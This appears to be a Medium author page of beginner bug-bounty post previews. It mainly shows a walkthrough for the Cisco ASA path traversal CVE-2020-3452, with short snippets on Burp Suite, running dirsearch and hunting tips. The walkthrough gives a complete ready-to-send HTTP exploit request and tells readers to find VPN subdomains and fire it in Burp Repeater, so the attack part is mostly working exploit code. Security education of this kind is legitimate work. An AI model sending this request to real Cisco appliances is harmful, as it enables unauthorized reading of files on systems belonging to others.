Sign in

hi everyone,

i hope you all are doing fantastic, in this blog i will tell you how you can modify response of web server using burp suite

its pretty easy but i know the struggle of beginners while using burp so this tutorial is especially for beginners( 1337s please don’t…

this blog is about teaching you how you can find Cisco ASA Path Traversal (CVE-2020–3452)

  1. find the subdomain containing vpn in it example “vpn.buggywebsite.com” “vpn02.buggywebsite.com” etc.
  2. open burp suite Repeater tab and paste this request

GET /+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ HTTP/1.1

Host: vpn.buggywebsite.com

Connection: close

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9

Sec-Fetch-Site: none

Sec-Fetch-Mode: navigate

Sec-Fetch-User: ?1

Sec-Fetch-Dest: document

Accept-Encoding: gzip, deflate

Accept-Language: en-GB,en-US;q=0.9,en;q=0.8

Cookie: tg=0T0tUQV8yRkFfVlBO; webvpnlogin=1; webvpnLang=en

*important- add enter 3 times after pasting this request to add 3 lines at the last of request

now forward the request and see the response

if its like this then its vulnerable

thats all my friend , hope you find this vulnerability, if you like this post the please share this with your friends

cheers

hey guys in this post i will tell you how you can run dirsearch on windows PC

step 1. go to https://github.com/maurosoria/dirsearch and download zip file and extract in any folder you like it will look like this

step 2. press shift key + right click and select “open command window here” and also make sure you have python 3 installed and path is set correctly

Hi everyone,

this is my second post on medium, hope you all are getting huge bounties, lets cut to the chase, here i compiled list of some tips given by reputed bug hunters on the tweet posted by intigriti.com

i don’t remember who posted what , so i wont be…

Hi everyone,

This post is about low effort P2 bug, this bug is not common and its severity is high but finding it is a piece of cake and only takes less than 5 minutes

here is a step by step procedure:

  1. lets say we have target example.com
  2. go to…

whatever

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store